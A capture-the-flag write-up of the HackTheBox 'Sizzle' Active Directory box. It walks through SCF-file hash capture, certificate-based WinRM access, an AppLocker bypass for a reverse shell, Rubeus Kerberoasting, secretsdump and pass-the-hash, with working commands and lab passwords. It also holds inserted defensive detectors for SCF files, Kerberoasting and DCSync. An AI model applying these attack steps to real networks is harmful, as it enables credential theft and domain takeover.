HackTheBox - Sizzle - WriteUp

Information Card

Brief

This is my writeup for HackTheBox's box called Sizzle, a really good and challenging box that requires you to exploit an Active Directory server. The box starts with exploiting an SMB share with the help of an SCF file attack, which combined with Evil-WinRM gives us our first foothold. Following that we Kerberoast the server to get user.txt, then obtain the NTLM hash for Administrator and log in via wmiexec.py.

Reconnaissance

I use a tool called nmapAutomator and it is something I can recommend; alternatively you can also use AutoRecon.

Nmap Basic Scan

# Nmap 7.80 scan initiated Mon Sep  7 19:36:12 2020 as: nmap -Pn -sCV -p21,53,80,135,139,389,443,445,464,593,636,3268,3269 -oN nmap/Basic_10.10.10.103.nmap 10.10.10.103
Nmap scan report for sizzle (10.10.10.103)
Host is up (0.078s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/7%Time=5F563E61%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-09-07T14:08:40
|_ start_date: 2020-09-07T13:58:46

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 7 19:39:20 2020 -- 1 IP address (1 host up) scanned in 187.28 seconds

Nmap Higher Port Scan

# Nmap 7.80 scan initiated Mon Sep  7 20:05:25 2020 as: nmap -Pn -sCV -p5985,5986,9389,47001,49664,49665,49668,49669,49677,49686,49687,49690,49693,49705,49722,49741 -oN nmap/Full_10.10.10.103.nmap 10.10.10.103
Nmap scan report for sizzle (10.10.10.103)
Host is up (0.086s latency).

PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after: 2019-07-02T20:26:23
|_ssl-date: 2020-09-07T14:36:39+00:00; 0s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49686/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49687/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49693/tcp open unknown
49705/tcp open msrpc Microsoft Windows RPC
49722/tcp open msrpc Microsoft Windows RPC
49741/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 7 20:06:39 2020 -- 1 IP address (1 host up) scanned in 73.91 seconds

Nmap UDP Scan

# Nmap 7.80 scan initiated Mon Sep  7 20:00:35 2020 as: nmap -Pn -sCVU --script vulners --script-args mincvss=7.0 -p53,123,61685,61961,62699,62958 -oN nmap/UDP_10.10.10.103.nmap 10.10.10.103
Nmap scan report for sizzle (10.10.10.103)
Host is up (0.080s latency).

PORT STATE SERVICE VERSION
53/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
123/udp open ntp NTP v3
61685/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
61961/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
62699/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
62958/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
5 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 7 20:01:02 2020 -- 1 IP address (1 host up) scanned in 27.42 seconds

This box had many services running and, looking at the type of services, my first hunch was that this is an Active Directory server, but the missing port 88 was odd to me. After getting some idea about the machine I started enumerating the box.

Enumeration

HTTP / HTTPS Enumeration

When I visited https://sizzle.htb.local I was greeted with a GIF. I ran gobuster against both HTTP and HTTPS in the background and carried on with my enumeration. I downloaded the GIF and used exiftool on it to check for metadata.

Gobuster

Gobuster returned the following result for gobuster-old -t 40 -u http://10.10.10.103 -x aspx,php -e -w $WORDLIST_COMMON -s 200,204,301,302,307,401:

=====================================================
2020/09/10 11:54:55 Starting gobuster
=====================================================
http://10.10.10.103/Images (Status: 301)
http://10.10.10.103/aspnet_client (Status: 301)
http://10.10.10.103/certenroll (Status: 301)
http://10.10.10.103/certsrv (Status: 401)
http://10.10.10.103/images (Status: 301)
http://10.10.10.103/index.html (Status: 200)
=====================================================
2020/09/10 11:55:25 Finished
=====================================================

Visiting http://10.10.10.103/certsrv asked for credentials. So I moved to the next service, SMB in hopes of getting some credentials to login.

SMB

I then tried to access the SMB shares anonymously and the server accepted the login.

SMB Anonymous Login

Directories like CertEnroll, Department Shares and Operations looked interesting; some relate to the directories we saw during HTTP enumeration. To enumerate further I mounted the share to the /mnt directory using sudo mount -t cifs "//10.10.10.103/Department Shares" /mnt, after which enumerating became a tad easier.

I downloaded all the files from ZZ_ARCHIVE. Comparing the hashes of all the files made it clear that they were all empty.

Finding unique files
find . -type f -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate

SMB Anonymous Login

Further file enumeration led us to the Users directory, which had many potential usernames. We write them to a file called usernames in case we have to brute-force logins.

Usernames

I then started looking at the file permissions of the directories and found that Public is writable. Since we can upload files to the share, we can exploit this with an SCF file attack: we upload a Shell Command File whose IconFile points to our host, so that the box requests the resource from us and we can capture the NTLM hash.

FileSCF

Listening for NTLM hashes
responder -I tun0

Responder captured the NTLM hash of Amanda

We can now crack Amanda’s hash with hashcat -m 5600 hash.amanda /home/alpha/wordlist/rockyou.txt -O

Cracked Password of Amanda
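The defensive counterpart of the SCF step above is finding planted files: the scanner below walks a mounted share and reports every .scf whose IconFile points at a UNC path, while leaving the local-icon "Show Desktop.scf" that Windows ships alone. This is an added example, not part of the writeup; the demo share layout, its files and the UNC host placeholder are all constructed.

```python
"""Scan a mounted share for Shell Command Files (.scf) whose IconFile points at a
remote UNC path, the planted file the SCF attack relies on. Added example, not
part of the writeup; the demo share and its files are constructed and the UNC
host is a placeholder."""
import configparser
import os
import re
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple

UNC_RE = re.compile(r"^\\\\[^\\]+\\")   # \\host\share...

def remote_icon_target(scf_path: Path) -> Optional[str]:
    """Return the UNC IconFile target of an .scf file, or None if it is local/absent/unparsable."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read(scf_path, encoding="utf-8")
    except (configparser.Error, UnicodeDecodeError):
        return None
    if not parser.has_section("Shell"):
        return None
    icon = parser.get("Shell", "IconFile", fallback="").strip().strip('"')
    return icon if UNC_RE.match(icon) else None

def scan_share(root: str) -> List[Tuple[str, str]]:
    """Walk the share and list (relative path, UNC target) for every .scf reaching out to a remote host."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".scf"):
                path = Path(dirpath) / name
                target = remote_icon_target(path)
                if target:
                    hits.append((path.relative_to(root).as_posix(), target))
    return sorted(hits)

def build_demo_share() -> str:
    """Create a constructed share layout resembling 'Department Shares' with one planted .scf."""
    root = tempfile.mkdtemp(prefix="demo_share_")
    files = {
        # Planted file: IconFile makes Explorer fetch the icon from a remote host (placeholder name).
        "Users/Public/desktop.scf": "[Shell]\r\nCommand=2\r\nIconFile=\\\\ATTACKER-HOST-PLACEHOLDER\\share\\icon.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n",
        # Windows' own "Show Desktop.scf" references a local icon and must not be flagged.
        "Users/Public/Show Desktop.scf": "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n",
        "ZZ_ARCHIVE/readme.txt": "",
    }
    for rel, body in files.items():
        p = Path(root) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body, encoding="utf-8")
    return root

if __name__ == "__main__":
    for rel, target in scan_share(build_demo_share()):
        print(f"suspicious SCF {rel} -> {target}")
```

Run it against the mount point of a writable share (for example /mnt from the mount command above) instead of the demo directory to audit a real share.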

LDAP

With the obtained credentials I checked whether LDAP could give us some more details about the machine. I used this to enumerate LDAP.

This did yield some useful results:

DSA info (from DSE):
Supported LDAP versions: 3, 2
Naming contexts:
DC=HTB,DC=LOCAL
CN=Configuration,DC=HTB,DC=LOCAL
CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL
DC=DomainDnsZones,DC=HTB,DC=LOCAL
DC=ForestDnsZones,DC=HTB,DC=LOCAL
Supported controls:
1.2.840.113556.1.4.1338 - Verify name - Control - MICROSOFT
1.2.840.113556.1.4.1339 - Domain scope - Control - MICROSOFT
1.2.840.113556.1.4.1340 - Search options - Control - MICROSOFT
1.2.840.113556.1.4.1341 - RODC DCPROMO - Control - MICROSOFT
1.2.840.113556.1.4.1413 - Permissive modify - Control - MICROSOFT
1.2.840.113556.1.4.1504 - Attribute scoped query - Control - MICROSOFT
1.2.840.113556.1.4.1852 - User quota - Control - MICROSOFT
1.2.840.113556.1.4.1907 - Server shutdown notify - Control - MICROSOFT
1.2.840.113556.1.4.1948 - Range retrieval no error - Control - MICROSOFT
1.2.840.113556.1.4.1974 - Server force update - Control - MICROSOFT
1.2.840.113556.1.4.2026 - Input DN - Control - MICROSOFT
1.2.840.113556.1.4.2064 - Show recycled - Control - MICROSOFT
1.2.840.113556.1.4.2065 - Show deactivated link - Control - MICROSOFT
1.2.840.113556.1.4.2066 - Policy hints [DEPRECATED] - Control - MICROSOFT
1.2.840.113556.1.4.2090 - DirSync EX - Control - MICROSOFT
1.2.840.113556.1.4.2204 - Tree deleted EX - Control - MICROSOFT
1.2.840.113556.1.4.2205 - Updates stats - Control - MICROSOFT
1.2.840.113556.1.4.2206 - Search hints - Control - MICROSOFT
1.2.840.113556.1.4.2211 - Expected entry count - Control - MICROSOFT
1.2.840.113556.1.4.2239 - Policy hints - Control - MICROSOFT
1.2.840.113556.1.4.2255 - Set owner - Control - MICROSOFT
1.2.840.113556.1.4.2256 - Bypass quota - Control - MICROSOFT
1.2.840.113556.1.4.2309
1.2.840.113556.1.4.319 - LDAP Simple Paged Results - Control - RFC2696
1.2.840.113556.1.4.417 - LDAP server show deleted objects - Control - MICROSOFT
1.2.840.113556.1.4.473 - Sort Request - Control - RFC2891
1.2.840.113556.1.4.474 - Sort Response - Control - RFC2891
1.2.840.113556.1.4.521 - Cross-domain move - Control - MICROSOFT
1.2.840.113556.1.4.528 - Server search notification - Control - MICROSOFT
1.2.840.113556.1.4.529 - Extended DN - Control - MICROSOFT
1.2.840.113556.1.4.619 - Lazy commit - Control - MICROSOFT
1.2.840.113556.1.4.801 - Security descriptor flags - Control - MICROSOFT
1.2.840.113556.1.4.802 - Range option - Control - MICROSOFT
1.2.840.113556.1.4.805 - Tree delete - Control - MICROSOFT
1.2.840.113556.1.4.841 - Directory synchronization - Control - MICROSOFT
1.2.840.113556.1.4.970 - Get stats - Control - MICROSOFT
2.16.840.1.113730.3.4.10 - Virtual List View Response - Control - IETF
2.16.840.1.113730.3.4.9 - Virtual List View Request - Control - IETF
Supported extensions:
1.2.840.113556.1.4.1781 - Fast concurrent bind - Extension - MICROSOFT
1.2.840.113556.1.4.2212 - Batch request - Extension - MICROSOFT
1.3.6.1.4.1.1466.101.119.1 - Dynamic Refresh - Extension - RFC2589
1.3.6.1.4.1.1466.20037 - StartTLS - Extension - RFC4511-RFC4513
1.3.6.1.4.1.4203.1.11.3 - Who am I - Extension - RFC4532
Supported features:
1.2.840.113556.1.4.1670 - Active directory V51 - Feature - MICROSOFT
1.2.840.113556.1.4.1791 - Active directory LDAP Integration - Feature - MICROSOFT
1.2.840.113556.1.4.1935 - Active directory V60 - Feature - MICROSOFT
1.2.840.113556.1.4.2080 - Active directory V61 R2 - Feature - MICROSOFT
1.2.840.113556.1.4.2237 - Active directory W8 - Feature - MICROSOFT
1.2.840.113556.1.4.800 - Active directory - Feature - MICROSOFT
Supported SASL mechanisms:
GSSAPI, GSS-SPNEGO, EXTERNAL, DIGEST-MD5
Schema entry:
CN=Aggregate,CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL
Other:
currentTime:
20200907163653.0Z
dsServiceName:
CN=NTDS Settings,CN=SIZZLE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=HTB,DC=LOCAL
defaultNamingContext:
DC=HTB,DC=LOCAL
schemaNamingContext:
CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL
configurationNamingContext:
CN=Configuration,DC=HTB,DC=LOCAL
rootDomainNamingContext:
DC=HTB,DC=LOCAL
supportedLDAPPolicies:
MaxPoolThreads
MaxPercentDirSyncRequests
MaxDatagramRecv
MaxReceiveBuffer
InitRecvTimeout
MaxConnections
MaxConnIdleTime
MaxPageSize
MaxBatchReturnMessages
MaxQueryDuration
MaxDirSyncDuration
MaxTempTableSize
MaxResultSetSize
MinResultSets
MaxResultSetsPerConn
MaxNotificationPerConn
MaxValRange
MaxValRangeTransitive
ThreadMemoryLimit
SystemMemoryLimitPercent
highestCommittedUSN:
118875
dnsHostName:
sizzle.HTB.LOCAL
ldapServiceName:
HTB.LOCAL:[email protected]
serverName:
CN=SIZZLE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=HTB,DC=LOCAL
isSynchronized:
TRUE
isGlobalCatalogReady:
TRUE
domainFunctionality:
7
forestFunctionality:
7
domainControllerFunctionality:
7

Once I had credentials I also used them to enumerate the service again with ldapsearch -x -h sizzle.htb.local -D 'amanda@htb.local' -w 'Ashare1972' -b 'dc=htb,dc=local' and this, which gave us the users and their associated certificates. Moving on.

Exploitation

Generating Certificate

After cracking Amanda's password I tried to log in to the certificate authority with the freshly obtained credentials, but the machine took an eternity to load the page. Anyhow, after it loaded I saw the page below:

Cracked Password of Amanda

Given this I generated a key for Amanda using openssl genrsa -aes256 -out amanda.key 2048, followed by a certificate signing request with openssl req -new -key amanda.key -out amanda.csr. This article might prove useful. After this go to the HTTP server and click Request a certificate > Advanced Certificate Request, paste the contents of the CSR into the Saved Request field and click Submit.

Request a Certificate

Submitting a Renewal Request

Download Issued Certificate

Evil-WinRM

Now with the help of Evil-WinRM we can get a shell. We have modified Alamot's script a little to suit us.

require 'winrm'

# Author: Alamot

# Connect to WinRM over HTTPS (port 5986) and authenticate with the client
# certificate issued to Amanda by the CA instead of a password.
conn = WinRM::Connection.new(
  endpoint: 'https://sizzle.htb.local:5986/wsman',
  transport: :ssl,
  client_cert: 'amanda.cer',                # certificate downloaded from certsrv
  client_key: 'amanda.key',                 # private key generated with openssl genrsa
  key_pass: 'mysuperstrongpassword',        # passphrase chosen for amanda.key
  no_ssl_peer_verification: true            # the box's certificate is not trusted by us
)

command = ""

conn.shell(:powershell) do |shell|
  until command == "exit\n"
    # Build and print a prompt of the form "PS user@host dir> "
    output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
    print(output.output.chomp)
    command = gets || "exit\n"              # treat EOF on stdin as exit
    # Stream the command's stdout and stderr as it runs
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}"
end

This lands us a shell. We then transfer nc.exe to the remote machine with Invoke-WebRequest. This machine was very hardened and it was difficult to transfer files between the remote box and mine. Anyhow, once I had transferred nc.exe I was unable to get a reverse shell because of Group Policy. After some research I came across a repository called UltimateAppLockerByPassList; this page in particular was interesting. Once I copied nc.exe to C:\Windows\Temp it gave me back a PowerShell reverse shell.

Privilege Escalation

Escalating to mrlky

Upon enumerating the network I found port 88, which wasn't visible in our nmap scans. To Kerberoast I chose Rubeus, since then I won't have to port forward. I switched to my Windows 10 VM and compiled Rubeus with Visual Studio; you can find a compiled version of the binary here.

Then I transferred the binary to the machine at C:\Windows\Temp\. Issuing .\rub.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972 to escalate to another user gave us the hash for a user called mrlky.

Kerberoasting with Rubeus

Cracking this hash with hashcat gives us the password Football#7.

Kerberoasting with Rubeus
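From the blue-team side, the Kerberoast step above leaves a recognisable trail in Security event 4769: one account asking the KDC for RC4-HMAC (etype 0x17) service tickets for several user accounts that carry an SPN. The detector below runs over constructed 4769 records; it is an added example, not part of the writeup, and the SPN owner svc_backup and the user bob are hypothetical.

```python
"""Detect Kerberoasting in Windows Security event 4769 (service ticket request)
records. Rubeus kerberoast asks for RC4-HMAC (etype 0x17) tickets for accounts
that have an SPN, so the signal is one account pulling RC4 tickets for several
user (non-computer) service accounts. Added example, not from the writeup; the
log lines are constructed (svc_backup, svc_web and bob are hypothetical)."""
from collections import defaultdict
from typing import Dict, Iterable, List

RC4_HMAC = "0x17"

# Constructed 4769 records flattened to key=value pairs (field names follow the event XML).
LOG_LINES = [
    "EventID=4769 TargetUserName=amanda@HTB.LOCAL ServiceName=mrlky TicketEncryptionType=0x17 IpAddress=::ffff:10.10.10.103 Status=0x0",
    "EventID=4769 TargetUserName=amanda@HTB.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=::ffff:10.10.10.103 Status=0x0",
    "EventID=4769 TargetUserName=amanda@HTB.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=::ffff:10.10.10.103 Status=0x12",  # failed request
    "EventID=4769 TargetUserName=bob@HTB.LOCAL ServiceName=mrlky TicketEncryptionType=0x12 IpAddress=::ffff:10.10.14.5 Status=0x0",         # AES ticket: normal use
    "EventID=4769 TargetUserName=bob@HTB.LOCAL ServiceName=SIZZLE$ TicketEncryptionType=0x17 IpAddress=::ffff:10.10.14.5 Status=0x0",       # computer account SPN
    "EventID=4769 TargetUserName=SIZZLE$@HTB.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::1 Status=0x0",
]

def parse_line(line: str) -> Dict[str, str]:
    """Split a flattened record into a field dict (first '=' separates key and value)."""
    return dict(tok.split("=", 1) for tok in line.split() if "=" in tok)

def is_roast_request(ev: Dict[str, str]) -> bool:
    """True for an issued RC4 service ticket naming a user account's SPN."""
    svc = ev.get("ServiceName", "")
    return (ev.get("EventID") == "4769"
            and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and ev.get("Status") == "0x0"          # only issued tickets can be cracked offline
            and not svc.endswith("$")               # computer accounts have long random passwords
            and svc.lower() != "krbtgt")

def kerberoast_suspects(lines: Iterable[str], min_spns: int = 2) -> Dict[str, List[str]]:
    """Map requesting account -> sorted user SPNs it pulled RC4 tickets for,
    keeping only accounts that touched at least min_spns distinct services."""
    spns = defaultdict(set)
    for line in lines:
        ev = parse_line(line)
        if is_roast_request(ev):
            spns[ev["TargetUserName"]].add(ev["ServiceName"])
    return {user: sorted(s) for user, s in spns.items() if len(s) >= min_spns}

if __name__ == "__main__":
    for user, services in kerberoast_suspects(LOG_LINES).items():
        print(f"{user} requested RC4 tickets for {', '.join(services)}")
```

Lowering min_spns to 1 is reasonable in a domain where AES is enforced for service accounts, since any RC4 ticket for a user SPN is then anomalous on its own.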

Escalating to Administrator

With the recently obtained credentials of mrlky we can try to dump the NTLM hashes of all users using secretsdump.py.

Dumping NTLM hashes
secretsdump.py sizzle.htb.local/mrlky:Football#7@10.10.10.103

Hashdump
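The secretsdump.py run above pulls every account's hash through directory replication, which a domain controller audits as Security event 4662 carrying the DS-Replication-Get-Changes control-access GUIDs in its Properties field. The check below flags such requests when they come from anything other than a known DC; it is an added example, not from the writeup, with constructed records and an assumed DC account list.

```python
"""Flag DCSync-style replication in Windows Security event 4662 records:
Properties listing the DS-Replication-Get-Changes GUIDs, requested by an
account that is not a domain controller. Added example, not from the writeup;
the records are constructed and the DC account list is assumed."""
import re
from typing import Dict, Iterable, List, Set, Tuple

REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"        # DS-Replication-Get-Changes
REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"    # DS-Replication-Get-Changes-All
REPL_GUIDS = {REPL_GET_CHANGES, REPL_GET_CHANGES_ALL}
USER_CLASS_GUID = "bf967aba-0de6-11d0-a285-00aa003049e2"         # schema GUID of 'user': an ordinary read

# Assumed: computer accounts of the domain's DCs, which legitimately replicate.
DC_ACCOUNTS = {"SIZZLE$"}

GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

# Constructed 4662 records: (SubjectUserName, Properties field as logged, one GUID per line).
EVENTS_4662: List[Tuple[str, str]] = [
    ("mrlky", "%%7688\n\t{" + REPL_GET_CHANGES + "}\n\t{" + REPL_GET_CHANGES_ALL + "}"),
    ("SIZZLE$", "%%7688\n\t{" + REPL_GET_CHANGES + "}\n\t{" + REPL_GET_CHANGES_ALL + "}"),
    ("amanda", "%%7688\n\t{" + USER_CLASS_GUID + "}"),
]

def replication_rights(properties: str) -> Set[str]:
    """Return the replication control-access GUIDs present in a 4662 Properties value."""
    return {g.lower() for g in GUID_RE.findall(properties)} & REPL_GUIDS

def dcsync_suspects(events: Iterable[Tuple[str, str]], dc_accounts=DC_ACCOUNTS) -> Dict[str, List[str]]:
    """Map each non-DC account that exercised replication rights to the GUIDs it used."""
    suspects: Dict[str, Set[str]] = {}
    for account, properties in events:
        if account.upper() in dc_accounts:
            continue                          # DC-to-DC replication is expected
        found = replication_rights(properties)
        if found:
            suspects.setdefault(account, set()).update(found)
    return {a: sorted(g) for a, g in suspects.items()}

if __name__ == "__main__":
    for account, guids in dcsync_suspects(EVENTS_4662).items():
        print(f"{account} used replication rights: {', '.join(guids)}")
```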

Since we have the NTLM hash of the Administrator we can use it to execute commands on the machine with wmiexec.py: wmiexec.py -hashes xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Administrator@10.10.10.103. I used this shell to get myself another PowerShell reverse shell.

root

Proof

Proof
echo "whoami"; whoami; echo "ifconfig"; ipconfig; echo "hostname"; hostname; echo "root.txt"; more C:\Users\Administrator\Desktop\root.txt; echo "user.txt" ; more C:\Users\mrlky\Desktop\user.txt

Say Cheese